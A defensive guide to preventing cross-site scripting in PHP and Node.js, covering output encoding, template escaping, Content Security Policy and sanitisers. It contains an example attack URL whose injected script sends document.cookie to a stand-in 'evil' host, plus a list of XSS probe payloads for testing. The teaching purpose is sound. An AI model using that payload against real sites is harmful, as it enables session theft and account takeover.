Preventing XSS (Cross-Site Scripting) in PHP and Node.js
Cross-site scripting (XSS) is one of the most common web application flaws: the OWASP Top 10 (2021) folds it into A03: Injection, the third-ranked category. The attack surface is wider than most developers realise, because every user input that eventually reaches a browser is a potential vector. This guide covers the three XSS types, the correct output-encoding defences in PHP and Node.js, and how Content Security Policy acts as a second line of defence.
What XSS is and why it matters
XSS happens when user-supplied content ends up in a page's HTML, CSS, or JavaScript without being properly encoded for that context — letting the attacker inject code that the victim's browser executes.
A single working XSS on a site with session cookies can:
- Steal session cookies (if they lack `HttpOnly`) → full account takeover
- Read any data the user can read (private messages, admin panels)
- Perform any action as the user (transfer funds, change email, delete posts)
- Pivot to CSRF by reading CSRF tokens from the page
- Serve malware to visitors
XSS and SQL injection share a root cause: mixing code with data. Different layer, different defence.
The three types
Stored XSS (the worst)
Attacker's payload is saved to the database and served to every visitor who views the page. Think: a comment field, forum post, user profile, product review.
Impact: one submission attacks every viewer of the page until the payload is removed.
Reflected XSS
Payload travels in a URL query parameter or form field and is reflected back in the response unescaped. Requires tricking the victim into clicking a link.
Example vulnerability:
```php
echo "Search results for: " . $_GET['q'];
```
Attack URL: `/search?q=<script>fetch('//evil/?c='+document.cookie)</script>`
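For comparison, here is the same page as a minimal Node.js sketch. `renderSearchResults` and `handleSearch` are hypothetical names, and the escaping helper mirrors the one in the Plain Node.js section. The point is that the query is escaped at the moment it is written into HTML, so the attack URL above renders as harmless text.

```javascript
// HTML-escape a value for element text or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;') // first, so the entities added below are not re-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical render function: the query is escaped at the point of output.
function renderSearchResults(q) {
  return `<p>Search results for: ${escapeHtml(q)}</p>`;
}

// Hypothetical request handler; wire it up with
// require('node:http').createServer(handleSearch).listen(3000)
function handleSearch(req, res) {
  const url = new URL(req.url, 'http://localhost');
  const q = url.searchParams.get('q') ?? '';
  res.writeHead(200, { 'Content-Type': 'text/html; charset=utf-8' });
  res.end(renderSearchResults(q));
}
```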
DOM-based XSS
Pure client-side — JavaScript reads untrusted input and writes it to the DOM:
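```javascript
document.getElementById('greeting').innerHTML = 'Hello ' + location.hash.substring(1);
```
Attack URL: `https://yoursite.com/page#<img src=x onerror=alert(1)>`
The server never sees the payload, because the fragment after `#` is not sent in the HTTP request: the attack is entirely client-side. The fix is client-side too: assign to `textContent` instead of `innerHTML`, so the browser treats the value as text.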
Defence #1: output encoding (the primary defence)
The fix for XSS is: encode output for the context it goes into. Different contexts need different encoders.
| Context | Encoder |
|---|---|
| HTML body text | HTML-escape (`<` → `&lt;` etc.) |
| HTML attribute value | HTML-escape, including both quote characters; always quote the attribute |
| Inside a URL (`href`, `src`) | URL-encode + validate the scheme (`http`/`https` only) |
| Inside JavaScript | JSON-encode (and escape `<` so `</script>` cannot close the tag) |
| Inside CSS | CSS-escape (rare; use only for user-controlled colour / size values) |
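To make the table concrete, here is a minimal Node.js sketch that writes one untrusted value into three of these contexts with three different encoders. The helper names (`htmlText`, `urlParam`, `jsValue`) are hypothetical; in real code, your template engine's built-in escaping should cover the HTML cases.

```javascript
// HTML body text or a quoted attribute value: escape the HTML-significant characters.
function htmlText(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A value placed inside a URL (here a query-string parameter): percent-encode it.
function urlParam(value) {
  return encodeURIComponent(String(value));
}

// A value placed inside an inline <script>: JSON-encode it, then escape
// <, > and & (as PHP's JSON_HEX_TAG / JSON_HEX_AMP do) so it cannot close the element.
function jsValue(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

// One untrusted value, three contexts, three encoders.
const input = `</script><img src=x onerror=alert(1)> "quoted" & more`;

const page = [
  `<p>${htmlText(input)}</p>`,
  // The URL sits in an attribute, so the percent-encoded value is HTML-escaped too.
  `<a href="/search?q=${htmlText(urlParam(input))}">search</a>`,
  `<script>const term = ${jsValue(input)};</script>`,
].join('\n');

console.log(page);
```

Note the layering on the link: the value is percent-encoded because it is part of a URL, then HTML-escaped because that URL sits inside an attribute.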
PHP — htmlspecialchars properly
```php
// Bad: attacker can break out of the attribute and inject HTML
echo '<a href="' . $url . '">' . $userName . '</a>';

// Correct: encode every dynamic value for its context.
// $url must ALSO pass an http/https scheme check: escaping alone
// does not stop a javascript: URL.
echo '<a href="' . htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">'
    . htmlspecialchars($userName, ENT_QUOTES | ENT_HTML5, 'UTF-8')
    . '</a>';
```
Flags matter:
- `ENT_QUOTES`: encodes both `"` and `'` (before PHP 8.1, the default encoded only `"`)
- `ENT_HTML5`: use HTML5 entities (e.g. `'` becomes `&apos;`)
- `'UTF-8'`: state the input character set explicitly instead of relying on the `default_charset` setting
Template engines typically do this automatically:
- Twig: `{{ var }}` auto-escapes; `{{ var|raw }}` does NOT
- Blade (Laravel): `{{ $var }}` auto-escapes; `{!! $var !!}` does NOT, so audit every `{!! !!}`
- Smarty: `{$var}` is auto-escaped only if escaping is switched on (`$smarty->escape_html = true` in Smarty 3/4)
Rule: if your template syntax requires extra effort to DISABLE escaping, you're safe by default.
Node.js — by template engine
React / Next.js: JSX auto-encodes any value rendered as text:
```jsx
<div>{userName}</div>          // safe
<a href={url}>{userName}</a>   // text is safe; url still needs an http/https check
```
The main dangerous API is `dangerouslySetInnerHTML` (aptly named):
```jsx
<div dangerouslySetInnerHTML={{ __html: userContent }} />  // DANGEROUS
```
If you need to render user-provided HTML (rare), sanitise it first with DOMPurify:
```jsx
import DOMPurify from 'dompurify';

<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(userHtml) }} />
```
Vue: `v-text` and `{{ expr }}` are safe; `v-html` is dangerous (same principle as React).
Express + template engines:
- EJS: `<%= var %>` escapes; `<%- var %>` does NOT
- Handlebars: `{{var}}` escapes; `{{{var}}}` does NOT
- Pug: `#{var}` escapes; `!{var}` does NOT
Every popular template engine follows a "safe by default, explicit opt-out" pattern. Use the safe form.
Plain Node.js string building
If you must build HTML yourself:
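```javascript
function escapeHtml(unsafe) {
  return String(unsafe)
    .replace(/&/g, '&amp;') // must run first, or it re-escapes the entities below
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

const userInput = '<img src=x onerror=alert(1)>'; // example untrusted value
const safe = `<div>${escapeHtml(userInput)}</div>`;
```
But really, use a template engine: hand-built HTML strings invite bugs.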
Defence #2: Content Security Policy
Even with proper encoding, one missed escape is a vulnerability. CSP is the second line — a browser-enforced policy that blocks inline scripts and external-origin JavaScript that you didn't explicitly allow.
Minimal starter CSP (place in HTTP header or <meta> tag):
```
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-RANDOM'; object-src 'none'; base-uri 'self'
```
- `default-src 'self'`: only same-origin resources by default
- `script-src 'self' 'nonce-RANDOM'`: scripts must be same-origin or carry a nonce you generated (a fresh random value per response)
- `object-src 'none'`: block `<object>` and `<embed>` (legacy attack vectors)
- `base-uri 'self'`: prevent `<base>` tag hijacking
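Deploy CSP in report-only mode first: send `Content-Security-Policy-Report-Only: ...` with a `report-uri` directive, monitor the violation reports, fix what breaks, then switch to the enforcing header. Report-only mode works only as an HTTP header, not in a `<meta>` tag.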
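A minimal Node.js sketch of the nonce mechanics, assuming you set headers yourself rather than through middleware: generate a fresh nonce per response, put it in the policy, and stamp the same value on your own inline scripts. `makeNonce`, `cspHeader`, `handlePage` and the `/csp-reports` endpoint are hypothetical names.

```javascript
const crypto = require('node:crypto');

// A fresh, unguessable nonce for every response (16 random bytes, base64).
function makeNonce() {
  return crypto.randomBytes(16).toString('base64');
}

// Builds the starter policy with the nonce filled in. With reportOnly set,
// the browser reports violations (to reportUri) instead of blocking them.
function cspHeader(nonce, { reportOnly = false, reportUri } = {}) {
  const directives = [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ];
  if (reportUri) directives.push(`report-uri ${reportUri}`);
  const name = reportOnly
    ? 'Content-Security-Policy-Report-Only'
    : 'Content-Security-Policy';
  return [name, directives.join('; ')];
}

// Hypothetical handler: the inline script carries the same nonce as the header.
function handlePage(req, res) {
  const nonce = makeNonce();
  const [name, value] = cspHeader(nonce, { reportOnly: true, reportUri: '/csp-reports' });
  res.setHeader(name, value);
  res.setHeader('Content-Type', 'text/html; charset=utf-8');
  res.end(`<script nonce="${nonce}">console.log('allowed');</script>`);
}
```

Flip `reportOnly` to `false` once the reports are clean.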
See our Security Headers Explained for full CSP setup with nonces.
Defence #3: input validation (secondary layer)
Not a substitute for output encoding, but a useful reject-early pattern. Validate inputs against strict allowlists:
```php
// Laravel validation
$request->validate([
    'username' => 'required|string|alpha_dash|max:50',
    'email'    => 'required|email|max:255',
    'age'      => 'required|integer|between:18,120',
]);
```
```javascript
// Node.js with zod
import { z } from 'zod';

const schema = z.object({
  username: z.string().regex(/^[a-zA-Z0-9_]{3,50}$/),
  email: z.string().email().max(255),
});

const data = schema.parse(req.body); // throws on invalid input
```
For rich-text user content (blog post bodies, comments with formatting), use an allowlist sanitiser:
- PHP: HTMLPurifier
- JavaScript: DOMPurify or sanitize-html

Each takes user HTML and strips anything not in its allowlist (like `<p>`, `<b>`, `<a>` with safe attributes), returning safe HTML.
Framework-specific notes
WordPress
- `esc_html($value)`: inside HTML body
- `esc_attr($value)`: inside HTML attributes
- `esc_url($value)`: inside `href`, `src`
- `esc_js($value)`: inside inline JavaScript (rare)
- `wp_kses($value, $allowed_tags)`: allow a limited set of HTML tags
WordPress core is well-audited — problems come from third-party plugins mixing echoed values with unsanitised inputs. Audit plugin code before deploying to production sites.
Laravel
- `{{ $var }}`: Blade auto-escapes
- `{!! $var !!}`: explicit opt-out, use only with trusted content
- `e($value)`: the `htmlspecialchars` shortcut, already applied by Blade `{{ }}`
- Raw HTML that must keep some tags: run it through an allowlist sanitiser such as HTMLPurifier first, then output it with `{!! !!}`
Express + Pug/EJS
Template engines default to escaping. Audit any template that uses the raw-output syntax (<%-, !{, {{{).
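Finding those spots can be partly automated. Here is a rough Node.js sketch (hypothetical `findRawOutput` / `scanTemplates` helpers) that lists every line using one of the raw-output forms above. It is a plain text search: it will flag EJS's `<%- include(...) %>` partials, which are normally fine, and it cannot see raw HTML produced in other ways, so treat the output as an audit list rather than a verdict.

```javascript
const fs = require('node:fs');
const path = require('node:path');

// Raw (unescaped) output syntax for the engines discussed above.
const RAW_OUTPUT_PATTERNS = [
  { engine: 'EJS', pattern: /<%-/ },
  { engine: 'Pug', pattern: /!\{/ },
  { engine: 'Handlebars', pattern: /\{\{\{/ },
];

// Returns { line, engine, text } for every line of a template that uses raw output.
function findRawOutput(source) {
  const hits = [];
  source.split(/\r?\n/).forEach((text, index) => {
    for (const { engine, pattern } of RAW_OUTPUT_PATTERNS) {
      if (pattern.test(text)) hits.push({ line: index + 1, engine, text: text.trim() });
    }
  });
  return hits;
}

// Walks a directory (e.g. a hypothetical views/ folder) and scans template files.
function scanTemplates(dir) {
  const results = [];
  for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) {
      results.push(...scanTemplates(full));
    } else if (/\.(ejs|pug|hbs|handlebars)$/.test(entry.name)) {
      for (const hit of findRawOutput(fs.readFileSync(full, 'utf8'))) {
        results.push({ file: full, ...hit });
      }
    }
  }
  return results;
}

// Usage: console.table(scanTemplates('views'));
```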
Testing for XSS
Safe payloads to try
On a staging copy of your app, enter these into every text field:
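```
<script>alert(1)</script>
"><script>alert(1)</script>
javascript:alert(1)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
" onmouseover="alert(1)
```
If any of these produce an alert, you have XSS (the `javascript:` one fires only when the link it ends up in is clicked, and the `onmouseover` one needs a hover). If they render as text, encoding is working.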
Automated tools
- OWASP ZAP — active scan includes XSS payload injection
- Burp Suite: the automated scanner (with XSS checks) is in the Professional edition; Community edition supports manual testing through Proxy and Repeater
- XSStrike — command-line XSS tester; use on staging / your own sites only
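The manual payload check can also run as an automated test. Here is a minimal Node.js sketch, assuming your output goes through an `escapeHtml` helper like the one in the Plain Node.js section (repeated here so the block stands alone); `findUnsafeEncodings` is a hypothetical name. It only checks HTML escaping: `javascript:alert(1)` contains no special characters and always passes, so URL fields still need a scheme check.

```javascript
// The payloads from the testing list.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '"><script>alert(1)</script>',
  'javascript:alert(1)',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(1)>',
  '" onmouseover="alert(1)',
];

// Stand-in for your real encoder (same logic as the Plain Node.js section).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Returns the payloads whose encoded form still contains a character that
// can open a tag or close a quoted attribute.
function findUnsafeEncodings(encode, payloads = PAYLOADS) {
  return payloads.filter((p) => /[<>"']/.test(encode(p)));
}

console.log(findUnsafeEncodings(escapeHtml)); // → []
```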
Static analysis
- PHP: `phpcs` with security rules, `psalm --taint-analysis`
- Node.js: `eslint-plugin-security`, `semgrep` with XSS rulesets
Common pitfalls
- Encoding at the wrong layer. Database-level escaping is for SQL injection; HTML-level escaping is for XSS. They are different: encode at output, not at storage.
- Double-encoding. If your template engine auto-escapes and you also escape manually, values get double-encoded: `<` becomes `&amp;lt;`, which the page displays as the literal text `&lt;` instead of `<`.
- Missing `ENT_QUOTES`. Without it (the default before PHP 8.1, or explicit flags that omit it), `htmlspecialchars` doesn't encode single quotes, so an attacker can break out of a single-quoted attribute.
- Using `strip_tags` for XSS defence. It removes tags but doesn't escape anything: `strip_tags("<b>foo</b>")` returns `"foo"`, but `strip_tags('" onmouseover="alert(1)')` returns its input unchanged, which breaks straight out of a double-quoted attribute.
- URL validation without a scheme check. `filter_var($url, FILTER_VALIDATE_URL)` accepts `javascript:` URLs such as `javascript://comment%0Aalert(1)`. Always check that `parse_url($url, PHP_URL_SCHEME)` is `http` or `https`.
- Assuming JSON is safe in HTML contexts. In `<script>var data = <?= $json ?></script>`, if `$json` contains `</script>`, the browser closes the script tag early. Use `json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)`.
- Blocking `<script>` but not event handlers. `<img onerror=alert(1)>` doesn't need `<script>`. You need proper HTML escaping, not substring blocklisting.
- User profile picture URLs without validation. An attacker's "profile picture URL" set to `javascript:alert(1)` lands in the `src` attribute if unvalidated; modern browsers won't run it from `<img src>`, but the same value reused as a link `href` runs on click.
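The URL and JSON pitfalls have direct Node.js equivalents. Here is a minimal sketch, assuming an allowlist built on the WHATWG `URL` parser (which normalises the scheme before you compare it) and a hand-rolled escaper that mirrors PHP's `JSON_HEX_TAG` / `JSON_HEX_AMP`. `isSafeHttpUrl` and `jsonForScript` are hypothetical names.

```javascript
// Allow only absolute http(s) URLs. The WHATWG URL parser lowercases the
// scheme and strips leading spaces and tab/newline characters, so tricks like
// "JaVaScRiPt:" or " javascript:" are normalised before the comparison.
function isSafeHttpUrl(input) {
  let url;
  try {
    url = new URL(input);
  } catch {
    return false; // not an absolute URL at all
  }
  return url.protocol === 'http:' || url.protocol === 'https:';
}

// JSON for an inline <script>: escape <, > and & so a value containing
// "</script>" cannot end the script element early. `data` must be JSON-serialisable.
function jsonForScript(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}
```

Relative URLs fail `isSafeHttpUrl` because `new URL()` needs an absolute URL. If you want to accept them, pass a base (`new URL(input, 'https://yoursite.com')`) and check `protocol` the same way.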
Defence in depth — the four layers
- Input validation — reject obvious attacks early; allowlists
- Output encoding — the primary defence; encode for each context
- Content Security Policy — second line; blocks unintended JavaScript
- Security headers: `X-Content-Type-Options: nosniff`; `X-XSS-Protection` is legacy (modern browsers ignore it, and current advice is to send `0` or omit it)
One missed encoding in layer 2 is not automatically a breach if layer 3 (CSP) blocks the injected script. Layered defence is the goal.
Frequently asked questions
Can XSS steal my site's admin session?
Yes, if the session cookie lacks `HttpOnly`. With `HttpOnly` set, JavaScript cannot read the cookie, so XSS impact is reduced but not eliminated: the attacker's script can still act as the user, because the browser attaches the cookie to the script's same-origin `fetch` requests.
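Setting the flag is a single cookie attribute. Here is a minimal Node.js sketch using the built-in `http` response API; the cookie name `sid` and the helpers are hypothetical, and `Secure` and `SameSite=Lax` are common companions rather than XSS defences in themselves.

```javascript
const crypto = require('node:crypto');

// Builds a session cookie that page JavaScript cannot read (HttpOnly),
// that is only sent over HTTPS (Secure), and that is withheld from most
// cross-site requests (SameSite=Lax).
function sessionCookie(sessionId, maxAgeSeconds = 3600) {
  return [
    `sid=${encodeURIComponent(sessionId)}`,
    'Path=/',
    'HttpOnly',
    'Secure',
    'SameSite=Lax',
    `Max-Age=${maxAgeSeconds}`,
  ].join('; ');
}

// Hypothetical login handler fragment: issue a random session ID.
function startSession(res) {
  const sessionId = crypto.randomBytes(32).toString('hex');
  res.setHeader('Set-Cookie', sessionCookie(sessionId));
  return sessionId;
}
```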
Is React safe from XSS by default?
Almost. Props rendered as JSX are auto-encoded. dangerouslySetInnerHTML is the escape hatch — audit every usage. Props passed to href / src attributes with javascript: URIs are also risky unless validated.
What about WYSIWYG editors?
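Rich-text editors (TinyMCE, CKEditor) produce HTML that you must store. Sanitise it on the server with an allowlist of safe tags (HTMLPurifier in PHP, or DOMPurify in Node.js, where it needs a DOM implementation such as jsdom) before storing or rendering it. Sanitising only in the browser before save is not enough, because an attacker can send the request directly. Never just trust WYSIWYG output.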
Does CSP replace output encoding?
No. CSP is defence-in-depth, not primary. A well-set CSP catches most XSS that slips through, but a motivated attacker can sometimes bypass CSP. Encode output first; CSP second.
How do I make inline scripts CSP-compliant?
Use nonces: the server generates a random nonce per request and includes it both in the CSP header (`'nonce-XYZ'`) and on every legitimate inline `<script nonce="XYZ">` tag. Attacker-injected scripts lack the right nonce and are blocked.
Is `eval()` an XSS risk?
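Yes, if you `eval()` user input. If `userInput` is `alert(document.cookie)`, then `eval('1 + ' + userInput)` runs that call; no `<script>` tag is needed, because `eval` already executes JavaScript. Never `eval()` user input: use `JSON.parse()` for data and proper parsers for expressions.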
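Here is a short Node.js illustration of the difference, using a hypothetical hostile string. `JSON.parse` only ever produces data, so text that is not valid JSON is rejected rather than executed. `parseSettings` is a hypothetical helper.

```javascript
// Untrusted text that is supposed to be plain data.
const userInput = '{"theme": "dark"}';
const hostile = 'alert(document.cookie)';

// eval('1 + ' + hostile) would call alert(document.cookie).
// JSON.parse never executes anything: valid JSON just becomes data...
const settings = JSON.parse(userInput);
console.log(settings.theme); // prints dark

// ...and input that is not JSON is rejected with a SyntaxError, never run.
function parseSettings(text) {
  try {
    return JSON.parse(text);
  } catch (err) {
    if (err instanceof SyntaxError) return null;
    throw err;
  }
}

console.log(parseSettings(hostile)); // prints null
```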
What if my framework auto-escapes but I still need to output raw HTML (e.g., blog post body)?
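Two safe paths: (1) pre-sanitise with DOMPurify / HTMLPurifier at save time and store only sanitised HTML; or (2) use Markdown for user input, render it with `marked.parse()`, and pass the resulting HTML through DOMPurify, because marked does not sanitise its output (its old `sanitize` option was deprecated and should not be relied on). Never un-escape user input and display it as raw HTML.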
Need help auditing your own code for XSS? [email protected] — our team can review specific templates or template-rendering patterns as a standard support request.